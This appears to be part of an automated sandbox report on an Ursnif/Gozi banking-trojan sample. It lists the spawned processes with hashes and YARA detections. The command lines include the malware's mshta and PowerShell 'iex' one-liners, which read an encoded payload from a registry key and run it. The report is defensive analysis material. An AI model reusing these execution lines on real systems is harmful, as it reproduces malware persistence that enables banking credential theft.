                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:02
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
                                                                                                                                                                                                    Imagebase:0x150000
                                                                                                                                                                                                    File size:232960 bytes
                                                                                                                                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:03
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Imagebase:0x7ff6f6b80000
                                                                                                                                                                                                    File size:823560 bytes
                                                                                                                                                                                                    MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:04
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:42
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:45
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:49
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
                                                                                                                                                                                                    Imagebase:0x820000
                                                                                                                                                                                                    File size:822536 bytes
                                                                                                                                                                                                    MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:56
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
                                                                                                                                                                                                    Imagebase:0x7ff667ba0000
                                                                                                                                                                                                    File size:14848 bytes
                                                                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:21:26:58
                                                                                                                                                                                                    Start date:15/02/2021
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Imagebase: 0x7ff7a7ef0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: Joe Security
• Rule: GoziRule, Description: Win32.Gozi, Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, Author: CCN-CERT
Reputation: high

General

Start time: 21:26:59
Start date: 15/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:27:07
Start date: 15/02/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Imagebase: 0x7ff7e9cb0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

General

Start time: 21:27:09
Start date: 15/02/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Imagebase: 0x7ff7a8450000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 21:27:13
Start date: 15/02/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Imagebase: 0x7ff7e9cb0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 21:27:14
Start date: 15/02/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Imagebase: 0x7ff7a8450000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 21:27:17
Start date: 15/02/2021
Path: C:\Windows\System32\control.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\control.exe -h
Imagebase: 0x7ff667820000
File size: 117760 bytes
MD5 hash: 625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 21:27:21
Start date: 15/02/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase: 0x7ff647450000
File size: 69632 bytes
MD5 hash: 73C519F050C20580F8A62C849D49215A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 21:27:23
Start date: 15/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Disassembly

Code Analysis